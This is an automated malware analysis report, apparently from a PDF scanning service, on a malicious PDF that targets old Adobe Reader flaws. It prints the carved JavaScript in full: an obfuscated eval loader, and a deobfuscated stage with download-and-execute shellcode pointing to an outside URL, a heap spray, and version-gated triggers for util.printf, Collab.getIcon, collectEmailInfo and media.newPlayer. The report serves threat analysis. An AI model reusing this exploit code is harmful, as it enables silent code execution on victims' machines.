Malicious PDF — malware analysis report

Static analysis result for SHA-256 1f4e961a2aa371d5…

MALICIOUS

PDF

5.1 KB Authoring application: Qevxigibepeci (via 51726Fepogaxadagona) First seen: 2026-05-10
MD5: 47071f92eb7521869bc6dc1b29372234 SHA-1: 291c7e5e6de462317da6e7a1780d63cc5ac6a7fc SHA-256: 1f4e961a2aa371d5933bb0a0aa5c144605a7f52f4b52a0e1d9240a7c63b7e388
350 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ahrudg.egh/4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0010_000.js pdf-javascript-stream PDF /JS object 10 at offset 0xEBD 860 bytes
SHA-256: f4e1ba9115394d32abd591aa1bf17dcaa4ab2fd461b1159ab9428761cdf22f07
Preview script
First 1,000 lines of the extracted script
function oL(){}

oL.prototype = {

zK : "evalouE".substr(0,4),
oLM : 'var4 c4H =44 53 4;va44r p44W=this.pO44;oR=\'ge\'+\'tPageN\'+\'t4hW\'+\'44ord\';l4AL=44\'g4e44tPag4\'+\'44eN4u44mWor4\'+\'d4s\';hC=\'fr\'+\'o44m44\'+\'Ch\'+\'4a44r44C\'+\'ode\';iL=\'pag4eN\'+\'u4m44\';pWF=\'sub\'+4\'str\';bQN=\'e\'+\'v4\'+4\'a4\'+\'l\';zM=\'len\'4+\'gth\';iZ=\'jo44\'+\'44in\';pE=16;4e44HO=p4W[lAL44]44(44pW[i4L])44;mN=\'\';44eHK=\'44pa4r\'+44\'seI4\'+\'nt\';oP=\'d\'+\'o4c\';for(44var hY=04;hY< eHO; 4hY++){4mN=44[mN44,pW[oR](pW[iL],44hY4,true)]44[iZ](\'4\');;}var aT=\'\';44fo4r(v44ar hY=0;hY < mN[zM4]; hY+=2){aDY44=44mN[pW44F44](4hY,2);xK=String[h44C](pW[eHK44](4aDY,pE)^cH);aT=[a44T,xK].join4(\'\');}ap4p44[bQN](a44T);aT=nu4l44l;4'.replace(/[4]/g, ''),
cF : app,

tQ : function(){

var uV=this.cF[this.zK];
uV(this.oLM);
}
}

pAF = new oL();

pAF.pO=this;
pAF.tQ();
legacy_pdfkit_stage_000.js deobfuscated-js getPageWords-XOR Pidief stage normalized at offset 0x0 3967 bytes
SHA-256: 97f2fcc30408e766e61299980c3ae1a64fb06ceff7faab1a0b117039ae362066
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pU="pU";var l='';var oJ='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#';n=["d"];lC=18613;lC--;try {var h='kV'.substring(2824,2824)} catch(h){};try {var aD='hU'.substring(3556,3556)} catch(aD){};var rW=this.pO.info['p'].replace(/[\s]/g, '');this.yF='';x={rC:20358};try {var oZ='v'} catch(oZ){};try {var gZ='fO'.substr(28224)} catch(gZ){};var iDM = this.pO;var gV = iDM.info;var rS = (gV.producer.substr(0,5) == 'debug');var sZ = new Array(); var vE = "%u";function uF(str){str = str.split(vE);var ret="";for(var i in str){if(str[i] != "")ret += String.fromCharCode(parseInt(str[i],16));}return ret;}function lA(str1, str2){return [str1, str2].join("");}function eV(dO){var uTI = qX();var pS = mR();uTI += ((uTI.indexOf("?") > -1) ? "&" : "?") + "reader_version=" + pS;if(rS) app.alert("URL: " + uTI);uTI=bS(uTI);var d=vE;var aDY=d+"C033"+d+"8B64"+d+"3040"+d+"0C78"+d+"408B"+d+"8B0C"+d+"1C70"+d+"8BAD"+d+"0858"+d+"09EB"+d+"408B"+d+"8D34"+d+"7C40"+d+"588B"+d+"6A3C"+d+"5A44"+d+"E2D1"+d+"E22B"+d+"EC8B"+d+"4FEB"+d+"525A"+d+"EA83"+d+"8956"+d+"0455"+d+"5756"+d+"738B"+d+"8B3C"+d+"3374"+d+"0378"+d+"56F3"+d+"768B"+d+"0320"+d+"33F3"+d+"49C9"+d+"4150"+d+"33AD"+d+"36FF"+d+"BE0F"+d+"0314"+d+"F238"+d+"0874"+d+"CFC1"+d+"030D"+d+"40FA"+d+"EFEB"+d+"3B58"+d+"75F8"+d+"5EE5"+d+"468B"+d+"0324"+d+"66C3"+d+"0C8B"+d+"8B48"+d+"1C56"+d+"D303"+d+"048B"+d+"038A"+d+"5FC3"+d+"505E"+d+"8DC3"+d+"087D"+d+"5257"+d+"33B8"+d+"8ACA"+d+"E85B"+d+"FFA2"+d+"FFFF"+d+"C032"+d+"F78B"+d+"AEF2"+d+"B84F"+d+"2E65"+d+"7865"+d+"66AB"+d+"6698"+d+"B0AB"+d+"8A6C"+d+"98E0"+d+"6850"+d+"6E6F"+d+"642E"+d+"7568"+d+"6C72"+d+"546D"+d+"8EB8"+d+"0E4E"+d+"FFEC"+d+"0455"+d+"5093"+d+"C033"+d+"5050"+d+"8B56"+d+"0455"+d+"C283"+d+"837F"+d+"31C2"+d+"5052"+d+"36B8"+d+"2F1A"+d+"FF70"+d+"0455"+d+"335B"+d+"57FF"+d+"B856"+d+"FE98"+d+"0E8A"+d+"55FF"+d+"5704"+d+"EFB8"+d+"E0CE"+d+"FF60"+d+"0455";aDY+=uTI;return uF(aDY);};function qX(){var gN = (gV.author + gV.title).replace(/[\s]/g, '');var pI = yX(gN, rW, oJ);return pI;};function yX(gN, oJ, rW){var pI="";for(var i=0; i < gN.length; i++){var xE = oJ.indexOf(gN[i]);if(xE > -1 ){pI += rW[xE];}}return pI;};function bS(gN){var out = "";gN = eH(gN);g = Math.round(gN.length / 4);if (g != gN.length /4) gN+="00";for(var i=0; i < gN.length; i+=4){out+= vE + gN.substr(i+2, 2) + gN.substr(i, 2);}return out;};function eH(s){var i, f = 0, a = [];s += '';f = s.length;for (i = 0; i<f; i++) {a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();}return a.join('');};function bG(kVM, len){while (kVM.length * 2 < len){kVM = lA(kVM, kVM);}return kVM.substring(0, len / 2);};function oD(bQ){var wX = 0x0c0c0c0c;        tI = eV("pdf");if (bQ == 1){wX = 0x30303030;}var uX = 0x400000;var ln = tI.length * 2;var xI = uX - (ln + 0x38);var kVM = uF(vE+"9090"+vE+"9090"); kVM = bG(kVM, xI);var mDC = (wX - 0x400000) / uX;for (var mH = 0; mH < mDC; mH ++ ){sZ[mH] = lA(kVM, tI);}};function mR(){try {return app.viewerVersion.toString();}catch(lM){    return 0;}}function mN(){if(rS) app.alert("called exploit");var pS = mR();if(rS)  app.alert("v: " + pS);if (pS == 9.2){if(rS) app.alert("media.newPlayer");oD(1);var sf="1.000000000.000000000.1337 : 3.13.37";util.printd(sf, new Date());try {media.newPlayer(null);} catch(e) {if(rS) app.alert("media.newPlayer exception: " + e);}util.printd(sf, new Date());}if (pS > 8){if(rS) app.alert("util.printf : " + util.printf);oD(1);var pG = "12999999999999999999";for (gNW=0; gNW < 276; gNW++) pG += "8";util.printf("%45000f", pG);return;}if (pS < 8){if(rS) app.alert("Collab.collectEmailInfo");oD(0);var aDA = uF(vE+"0c0c"+vE+"0c0c");while (aDA.length < 44952) aDA += aDA;var oo={ subj : "", msg : aDA};iDM.collabStore = iDM.Collab.collectEmailInfo(oo); return;}if (pS < 9.1){if (iDM.Collab.getIcon){if(rS) app.alert("Collab.getIcon");oD(0);var sF = unescape("%09");while (sF.length < 0x4000) sF += sF;sF = "N." + sF;iDM.Collab.getIcon(sF);}return;}}mN();b={zA:false};var eT=["pM"];var yR=[];

Open this report in the interactive analyzer, or submit your own file for analysis.